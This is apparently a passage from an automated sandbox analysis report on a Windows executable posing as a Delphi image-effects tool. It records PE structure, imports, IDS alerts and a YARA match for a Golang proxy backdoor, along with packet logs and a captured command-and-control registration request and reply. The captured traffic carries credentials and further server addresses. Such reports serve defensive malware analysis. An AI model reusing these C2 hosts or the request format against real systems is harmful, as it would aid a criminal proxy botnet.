                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  CODE0x10000x3d6da80x3d6e00ecced6aea8a733a4a1fcf030a1def2c2unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  DATA0x3d80000x237c0x240035f406e3381155c89a5edf6f76370e38False0.4391276041666667data4.505443714844566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  BSS0x3db0000x25390x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0x3de0000x269e0x28002958723e58b41fd82a37c7d52b2e382eFalse0.35771484375data4.964278995708769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .tls0x3e10000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata0x3e20000x180x2004b630e3f6f27e175377ada9d376c0405False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "~"0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .reloc0x3e30000xc0fc0xc2005573c821ff9e2229523713805246064cFalse0.5588555090206185data6.654312615642515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  .rsrc0x3f00000x3760000x29600008ba4846e95360ea792534aa73123308unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                  ogmsrn0x7660000x10530x20006deaf729129660e4e05c5f63364d2ceFalse1.021484375data7.589688260136585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0x3f0e9c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                  RT_CURSOR0x3f0fd00x134data0.4642857142857143
                  RT_CURSOR0x3f11040x134data0.4805194805194805
                  RT_CURSOR0x3f12380x134data0.38311688311688313
                  RT_CURSOR0x3f136c0x134data0.36038961038961037
                  RT_CURSOR0x3f14a00x134data0.4090909090909091
                  RT_CURSOR0x3f15d40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                  RT_BITMAP0x3f17080x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                  RT_BITMAP0x3f18d80x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                  RT_BITMAP0x3f1abc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                  RT_BITMAP0x3f1c8c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                  RT_BITMAP0x3f1e5c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                  RT_BITMAP0x3f202c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                  RT_BITMAP0x3f21fc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                  RT_BITMAP0x3f23cc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                  RT_BITMAP0x3f259c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                  RT_BITMAP0x3f276c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                  RT_BITMAP0x3f293c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                  RT_BITMAP0x3f2a240x228Device independent bitmap graphic, 28 x 28 x 4, image size 448EnglishUnited States0.2536231884057971
                  RT_BITMAP0x3f2c4c0x268Device independent bitmap graphic, 32 x 32 x 4, image size 512RussianRussia0.3181818181818182
                  RT_BITMAP0x3f2eb40x66aDevice independent bitmap graphic, 24 x 24 x 8, image size 1642, resolution 2834 x 2834 px/m0.8873325213154689
                  RT_ICON0x3f35200x1f91PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.967949511199109
                  RT_ICON0x3f54b40x10828Device independent bitmap graphic, 128 x 256 x 32, image size 00.05487696675736425
                  RT_ICON0x405cdc0x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 00.07399621610258567
                  RT_ICON0x40f1840x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.125
                  RT_ICON0x4133ac0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.17147302904564315
                  RT_ICON0x4159540x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.28588180112570355
                  RT_ICON0x4169fc0x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.4081967213114754
                  RT_ICON0x4173840x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6054964539007093
                  RT_DIALOG0x4177ec0x52data0.7682926829268293
                  RT_STRING0x4178400x198data0.5147058823529411
                  RT_STRING0x4179d80x3b4data0.3575949367088608
                  RT_STRING0x417d8c0x3b8data0.42436974789915966
                  RT_STRING0x4181440x1f8data0.5277777777777778
                  RT_STRING0x41833c0xe8data0.5905172413793104
                  RT_STRING0x4184240x128data0.5574324324324325
                  RT_STRING0x41854c0x2e0data0.4320652173913043
                  RT_STRING0x41882c0x40cdata0.37741312741312744
                  RT_STRING0x418c380x398data0.3804347826086957
                  RT_STRING0x418fd00x3acdata0.35212765957446807
                  RT_STRING0x41937c0x3bcdata0.3985355648535565
                  RT_STRING0x4197380xf4data0.47540983606557374
                  RT_STRING0x41982c0xc4data0.5663265306122449
                  RT_STRING0x4198f00x2e0data0.44429347826086957
                  RT_STRING0x419bd00x35cdata0.40813953488372096
                  RT_STRING0x419f2c0x2b4data0.4060693641618497
                  RT_RCDATA0x41a1e00x10data1.5
                  RT_RCDATA0x41a1f00x38cdata0.6850220264317181
                  RT_RCDATA0x41a57c0x1015cDelphi compiled form 'TFormAdjust'0.20882156517515635
                  RT_RCDATA0x42a6d80x4cd4fDelphi compiled form 'TFormChangjingAdjust'0.2264452515546404
                  RT_RCDATA0x4774280x1f4d19Delphi compiled form 'TFormMain'0.20725727081298828
                  RT_RCDATA0x66c1440x22dDelphi compiled form 'TFormProcessing'0.6086175942549371
                  RT_RCDATA0x66c3740xdfd1Delphi compiled form 'TFormRegister'0.312930868980924
                  RT_RCDATA0x67a3480xb6ddDelphi compiled form 'TFormResize'0.26986093606476835
                  RT_GROUP_CURSOR0x685a280x14Lotus unknown worksheet or configuration, revision 0x11.25
                  RT_GROUP_CURSOR0x685a3c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                  RT_GROUP_CURSOR0x685a500x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x685a640x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x685a780x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x685a8c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_CURSOR0x685aa00x14Lotus unknown worksheet or configuration, revision 0x11.3
                  RT_GROUP_ICON0x685ab40x76data0.7711864406779662
                  RT_VERSION0x685b2c0x30cdataEnglishUnited States0.44743589743589746
                  DLLImport
                  kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                  user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                  kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                  advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                  kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFileAttributesA, GetDriveTypeA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
                  version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                  gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PathToRegion, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPath, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, CloseFigure, BitBlt, BeginPath
                  user32.dllWindowFromPoint, WindowFromDC, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LockWindowUpdate, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRgn, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemRect, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DeferWindowPos, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, BeginDeferWindowPos, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                  kernel32.dllSleep
                  oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                  comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                  winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                  shell32.dllShellExecuteA
                  comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                  DescriptionData
                  CompanyName
                  FileDescriptionProfessional Image Effect
                  FileVersion1.00
                  InternalNameProfessional Image Effect for DELPHI
                  LegalCopyright
                  OriginalFilenameProfessional Image Effect for DELPHI
                  DeveloperBabak Sateli
                  E-MAILbabak_sateli@yahoo.com
                  Translation0x0409 0x04e4

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  RussianRussia

                  Network Behavior

                  Download Network PCAP: filteredfull

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2025-02-11T10:55:40.448676+01002855478ETPRO MALWARE Golang Backdoor Activity - Observed GhostSOCKS related1192.168.2.114990346.8.232.10630001TCP
                  2025-02-11T10:55:41.000742+01002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21185.121.233.15214887192.168.2.1149932TCP
                  2025-02-11T10:55:41.001163+01002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.1149932185.121.233.15214887TCP
                  2025-02-11T10:56:10.449366+01002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.1149932185.121.233.15214887TCP
                  2025-02-11T10:56:10.628328+01002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11185.121.233.15214887192.168.2.1149932TCP

                  Network Port Distribution

                  • Total Packets: 20
                  • 30001 undefined
                  • 14887 undefined
                  TimestampSource PortDest PortSource IPDest IP
                  Feb 11, 2025 10:55:36.337142944 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:55:36.341950893 CET300014990346.8.232.106192.168.2.11
                  Feb 11, 2025 10:55:36.345905066 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:55:36.346422911 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:55:36.351176023 CET300014990346.8.232.106192.168.2.11
                  Feb 11, 2025 10:55:40.402940035 CET300014990346.8.232.106192.168.2.11
                  Feb 11, 2025 10:55:40.411870003 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:55:40.416686058 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:55:40.416770935 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:55:40.448676109 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:55:41.000741959 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:55:41.001163006 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:55:41.006496906 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:55:56.017523050 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:55:56.022316933 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:00.953023911 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:00.953327894 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:00.958223104 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:10.407001972 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:56:10.411890984 CET300014990346.8.232.106192.168.2.11
                  Feb 11, 2025 10:56:10.449366093 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:10.454149961 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:10.628328085 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:10.671570063 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:21.132033110 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:21.132390976 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:21.137233019 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:36.148644924 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:36.153506041 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:40.414273024 CET4990330001192.168.2.1146.8.232.106
                  Feb 11, 2025 10:56:40.419260979 CET300014990346.8.232.106192.168.2.11
                  Feb 11, 2025 10:56:40.666491032 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:40.671468973 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:40.845026016 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:40.891690016 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:41.311499119 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:41.311753035 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:41.318862915 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:56:56.320564985 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:56:56.325393915 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:57:01.493802071 CET1488749932185.121.233.152192.168.2.11
                  Feb 11, 2025 10:57:01.494286060 CET4993214887192.168.2.11185.121.233.152
                  Feb 11, 2025 10:57:01.499170065 CET1488749932185.121.233.152192.168.2.11

                  HTTP Request Dependency Graph

                  • 46.8.232.106:30001

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.114990346.8.232.106300017712C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  TimestampBytes transferredDirectionData
                  Feb 11, 2025 10:55:36.346422911 CET294OUTGET /api/helper-first-register?buildVersion=0z76.pdO2CqG&md5=2e82e1c508af8197f9a033822e9d742f&proxyPassword=3ijnTpLW&proxyUsername=4dUZxibc&userId=gyQqwSb2enJmg2j1kyuweSXakKqafLse HTTP/1.1
                  Host: 46.8.232.106:30001
                  User-Agent: Go-http-client/1.1
                  X-Api-Key: GAlbhK5H
                  Accept-Encoding: gzip
                  Feb 11, 2025 10:55:40.402940035 CET1185INHTTP/1.1 200 OK
                  Date: Tue, 11 Feb 2025 09:55:40 GMT
                  Content-Length: 1066
                  Content-Type: text/plain; charset=utf-8
                  Data Raw: 31 38 35 2e 31 32 31 2e 32 33 33 2e 31 35 32 3b 31 34 38 38 37 3b 68 51 55 61 74 6d 71 4f 74 52 61 49 70 47 64 63 3a 47 74 78 2f 30 7a 54 2f 54 42 44 34 4b 62 41 36 31 4f 58 2e 69 57 32 38 47 43 33 2e 45 4a 54 32 33 77 70 33 76 62 4d 32 37 47 70 2e 78 64 47 31 48 68 4b 30 4e 6d 56 36 33 6c 55 3a 44 73 74 33 72 41 42 30 50 75 69 30 36 74 34 30 55 71 47 31 39 4f 6c 2f 46 6c 6d 61 43 56 49 70 53 44 44 69 50 61 77 2f 42 34 6e 68 73 67 61 65 65 33 53 6c 52 71 31 70 35 48 30 65 75 41 62 72 34 38 68 2d 4d 6e 74 66 59 47 36 69 51 41 76 72 39 4f 6a 73 73 72 69 74 4b 61 48 2d 4b 39 47 72 4e 41 64 65 63 74 49 67 51 63 76 69 33 45 4e 73 49 7a 4b 74 62 51 76 65 49 52 56 72 68 46 32 2c 31 61 77 68 72 64 44 74 45 31 49 74 4d 4f 6f 70 37 37 44 3a 54 52 70 2f 50 69 56 2f 69 4e 55 34 50 5a 65 36 6c 4b 75 2e 50 44 58 38 52 5a 62 2e 79 4e 52 32 64 54 4c 33 30 39 68 36 47 4b 6c 2e 6e 47 70 36 59 44 41 31 61 77 56 3a 35 39 56 33 42 45 48 30 63 35 56 30 33 6d 53 30 76 74 6b 31 4c 4f 6e 2f 37 55 65 61 69 62 49 70 6d 59 46 [TRUNCATED]
                  Data Ascii: 185.121.233.152;14887;hQUatmqOtRaIpGdc:Gtx/0zT/TBD4KbA61OX.iW28GC3.EJT23wp3vbM27Gp.xdG1HhK0NmV63lU:Dst3rAB0Pui06t40UqG19Ol/FlmaCVIpSDDiPaw/B4nhsgaee3SlRq1p5H0euAbr48h-MntfYG6iQAvr9OjssritKaH-K9GrNAdectIgQcvi3ENsIzKtbQveIRVrhF2,1awhrdDtE1ItMOop77D:TRp/PiV/iNU4PZe6lKu.PDX8RZb.yNR2dTL309h6GKl.nGp6YDA1awV:59V3BEH0c5V03mS0vtk1LOn/7UeaibIpmYFiLuD/mp1hyhUeGQnlcKPptp0eQVJrTDE-o0jfAhhiOHbrbFjs7ZYtbIC-JiyrdtLeeptgziIiHC6sjuVtXfgeKdRrO3y,OAHhznstfootwqgpcPy:oeQ/2ya/aiA9JRU1qGX.0jt2NHK1cHP2anY.sVd1G9T6U7I6BSV.Dgw9Glh1tLs:sJg3dfQ0jSz0XiE0AyT1NZI/bXoaSJzptOWiu8j/3nTh6Y3eZPfl693pvhpeahlrHvE-rccfaYFi4XIrsE8stq4tCi9-K0ir52oeytkgNYdiYfcsHrbtUxpeVNbrrrz,LT0hf9stUcrtFmxpLdL:Nkd/Lne/wqu9Wbc11c0.MFn2ORD1pP02KXW.pcr13Hc69bE658i.AqI9Acw:Ojo3c9G0faH08LC0xxl1VJv/QUpaEEsp5FliUXk/JfKhpO3e9oclrA2p0JsentQr4Yh-mfMfYzeiY6jr3JzsRqzt3Db-UnLrzM5e6NUgvfpiQIfs6yptqVBepZ7r2cH,WXFhIzAtNMStHzdpaaO:162/baw/bve1tLW4rl77L88.SVy4uSz5gqh.x5v1vCg9gWK6PSM.BLe1hjE5PTN77MK:qcj3Zr708pf0xl90T9T1ZJF/rviasLXp4A5irLN/kbshbYdeXZYl5l6plZVeorJr5SS-gtZft [TRUNCATED]


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  • File
                  • Registry
                  • Network

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:04:55:00
                  Start date:11/02/2025
                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.14890.8913.exe"
                  Imagebase:0x6c0000
                  File size:6'808'576 bytes
                  MD5 hash:2E82E1C508AF8197F9A033822E9D742F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Borland Delphi
                  Yara matches:
                  • Rule: JoeSecurity_GOBackdoor, Description: Yara detected GO Backdoor, Source: 00000000.00000002.2581726494.000000000C940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false
                  Show Windows behavior

                  File Activities

                  Show Windows behavior

                  Section Activities

                  Show Windows behavior

                  Registry Activities

                  Show Windows behavior

                  Mutex Activities

                  Show Windows behavior

                  Process Activities

                  Show Windows behavior

                  Thread Activities

                  Show Windows behavior

                  Memory Activities

                  Show Windows behavior

                  System Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Windows UI Activities

                  Show Windows behavior

                  Network Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  General

                  Target ID:5
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 756
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Section Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Process Activities

                  Show Windows behavior

                  Thread Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Windows UI Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  General

                  Target ID:7
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 780
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Section Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Process Activities

                  Show Windows behavior

                  Thread Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Windows UI Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  General

                  Target ID:9
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 796
                  Imagebase:0xbe0000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Section Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Process Activities

                  Show Windows behavior

                  Thread Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  Show Windows behavior

                  Windows UI Activities

                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                  General

                  Target ID:11
                  Start time:04:55:35
                  Start date:11/02/2025
                  Path:C:\Windows\SysWOW64\WerFault.exe
